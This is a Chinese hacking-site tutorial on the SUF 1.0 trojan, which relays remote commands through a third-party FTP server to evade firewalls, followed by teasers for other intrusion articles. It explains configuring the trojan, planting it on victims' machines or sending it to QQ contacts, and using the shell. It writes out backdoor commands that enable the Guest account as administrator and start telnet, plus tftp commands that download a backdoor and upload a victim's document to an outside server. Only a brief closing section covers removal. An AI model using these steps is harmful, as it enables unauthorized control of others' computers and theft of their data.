网络入侵也玩双通道

所属分类: 网络安全 / 黑客入侵 阅读数: 132
收藏 0 赞 0 分享
一个14岁的男孩经过无数次的实验,推出了一款全新的木马——SUF 1.0,该后门运用了“反弹端口原理”与“FTP 隧道技术”,也就是两台机器不直接传输数据,而是利用第三台机器(FTP服务器)来交换数据.
  SUF(Shell Use Ftp)顾名思义,就是通过FTP的Shell。这种奇妙的思路真叫绝的,它充分利用防火墙“外严内不严”的漏洞,客户端生成服务端后,把客户端主机的IP发送到FTP里,然后别人运行服务端后下载IP文件,然后通过反向连接,使客户端知道服务端上线,然后把要执行的命令发送到FTP里,服务端再读取FTP里要执行的命令,最后完成执行。
  说了这么一大堆,SUF是不是真的有这么厉害?用事实来说明一切,跟我来……
  一、摩拳擦掌——配置服务端
  和一般的木马后门大体相同,首先将下载下来的SUF 1.0解压缩,双击运行其中的client.exe,出现主窗口,非常简洁明了吧!点击“配置服务端”按钮,弹出了配置对话窗口,这里仅需要配置一下FTP服务选项。在“FTP”栏中填入一个有写权限的FTP服务器,如:Ftp.abc.com或者220.202.242.98。接着在“端口”栏中填写好FTP服务器端口,默认为21。再在“用户名”和“密码”栏中输入FTP帐户名称和密码,点击“配置服务器”,出现一提示对话框,点击“确定”,这时程序就会开始验证FTP服务器,验证成功后请选择木马服务端(server.exe)的路径,最后完成配置。
  小提示:如果要给服务端加壳,请在配置服务端之前给服务端(server.exe)加壳,服务端是可重复配置的。同时一定要确保使用的FTP帐户对FTP服务器有写的权限。
二、玩弄骨掌——轻松来控制
  接下来是玩木马后门必不可少的环节,那就是种植木马。种植木马的方法、途径有很多,以前也专门有文章介绍过,大家可以发挥自己的聪明才智,把服务端上传到肉鸡或者发给QQ好友等,当服务端程序被运行后,一般的使用者很难感觉到计算机有异常,防火墙也不会出现报警。其实,一只黑手正在慢慢靠近,服务端程序会自动从FTP服务器中获取客户端的IP地址,然后开始反向连接,这时服务端计算机的IP地址就会出现在客户端的“上线列表”中。
  小提示:客户端计算机必须是直接连接到Internet,而不能是处于内网中,同时,如果开启了防火墙的话,请打开5915端口。
  在“上线列表”中双击某一在线计算机的IP(例如:220.202.242.100),出现“连接到220.202.242.100”对话窗口,这就已经得到了目标计算机的一个系统权限的Shell,现在想干什么就自由发挥吧!
  想想既然是送上门的肉鸡,还是留个后门,以便日后再次光顾吧!这里就将Guest帐户激活,并提升为管理员,再开启目标计算机的Telnet服务,下面就看如何来实现?请输入命令:net user guest /active:yes,点击“运行”来激活Guest帐户,再运行命令:net localgroup administrators guest /add,将Guest加入管理员组,最后再运行命令:net start telnet,开启目标计算机的远程登录服务。
  其实,在这里有很多东东可以应用的,比如可以通过FTP命令或者TFTP来远程下载/上传文件。这里假设已经知道有一个TFTP服务器220.202.242.99,我们从服务器上下载一个后门程序Sy.exe,只要运行命令:tftp 220.202.242.99 get sy.exe;要把肉鸡上的一个数据文档Ccash.doc上传到TFTP服务器只要运行命令:tftp 220.202.242.99 put Ccash.doc。
  小提示:Windows自身附带了一个简单的文件上传下载程序Tftp.exe,可要建立TFTP服务器,就得借助TFTPD32了。
  三、摆脱控制——隔离隧道
  虽然SUF 1.0的实现方法非常隐蔽,可还是能够将其剿灭的,可以借助Active Ports(下载地址:http://www.ldcatv.com/soft/aports.rar)等端口实时监测工具来发现、中止它。如果中了SUF后门,就可在“Active Ports”主窗口中发现两个server.exe进程,其中一个通过4319端口与FTP服务器进行通讯,另一个通过4321端口与客户端计算机进行通讯。选择它们,再点击“Terminate Process”来结束进程。然后在资源管理器中将server.exe删除,这样就摆脱了SUF的控制。
更多精彩内容其他人还在看

黑客技术讲解 网吧入侵方法大搜罗

首先,我们了解被破坏网吧的客观环境,要了解网吧人员的实地监测等。尤其要注意看有没有闭路电视监控。如果网吧人员对你的个人资料相当熟悉,就住手免的惹麻烦了。部分网吧要出示身份证也不要破坏了,免的惹麻烦。以下破坏方法不分先后,请量力灵活运用若干破坏组合。具体
收藏 0 赞 0 分享

通过Asp入侵Webserver

通过asp入侵web server,窃取文件毁坏系统,这决非耸人听闻... iis的安全性问题 1.iis3/pws的漏洞 我实验过,win98 pws上运行ASP程序,只须在浏览器地址栏内多加一个小数点ASP程序就会被下载下来。IIS3听说也有同样的问题,
收藏 0 赞 0 分享

详尽的IPC$入侵

一 唠叨一下: 网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄. 不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步
收藏 0 赞 0 分享

如何入侵ADSL

这是一位所谓的"黑客"的口述,你不妨看一下,也许你看完后对他的技术性做法不是完全明白,但是你肯定会感到一身冷汗,因为我们现在使用ADSL已经日益广泛,但我们的安全意识还不是很强.听完他的口述希望大家在日后能加强安全防范! 口述: 也许看烂了网上已有的
收藏 0 赞 0 分享

看我来入侵复旦大学(图)

一、师出有名 某日十分无聊,就和X论坛的超级版主wyzhack瞎吹牛,东年西扯的。后来不知道怎么的扯到复旦去了,他提议说不如我们黑掉复旦吧。正好当时也比较清闲,就答应一起看看了,嘿嘿。这次跑去黑复旦纯粹是为了练习技术。 二、战略部署 这次要拿的
收藏 0 赞 0 分享

领土之争——入侵某视讯服务器回忆录

老早就打算写这样一篇文章:能够细致地反映出入侵中攻防的具体内容,我想这比单纯的技术文章有趣的多。有鉴于此,我将尽力完整描述入侵过程中的思考方式。 1.石榴裙下的kk 说实话,就第一次拿到权限而言,没有多少技术含量。我花了N久时间收集KK网络的各种信息,最终
收藏 0 赞 0 分享

黑客攻防实战之对有防火墙网站入侵过程

前几天群里的兄弟给了一个网站,问我可不可以入侵。   一、踩点   ping www.111.com 发现超时,可以是有防火墙或做了策略。再用superscan扫一下,发现开放的端口有很多个,初步估计是软件防火墙。   二、注入   从源文件里搜索关键字asp
收藏 0 赞 0 分享

看看黑客都在偷窥什么!入侵个人电脑揭密(图)

前几天看《南国早报》说一位女孩个人电脑被黑客入侵控制,把裸照发到网上威胁女孩的事。联想到最近网上这样的事挺多的,就想给大家说说怎么防范。 其实现在的网络真的不安全~只要你的电脑连接上网络就存在一定的风险。黑客并不是万能的,他们入侵的电脑都是存在比较严重
收藏 0 赞 0 分享

XSS Phishing - 新式跨站脚本攻击方式(图)

最近跨站脚本漏洞好像比较火,国内的一些比较出名的WEB程序都陆续暴出了跨站脚本漏洞,但是一提到跨站脚本漏洞的攻击方式大家都哑火了,因为在常规的概念中这种漏洞最多是挂网页木马,获取COOKIE之类,属于典型的鸡肋漏洞! 跨站脚本攻击最大的魅力是通过HTML注
收藏 0 赞 0 分享

PHP数据库安全之SQL注入

$offset = $argv[0]; // 注意,没有输入验证!   $query = "SELECT id, name FROM products ORDER BY name LIMIT 20 OFFSET $offset;";   $resu
收藏 0 赞 0 分享
查看更多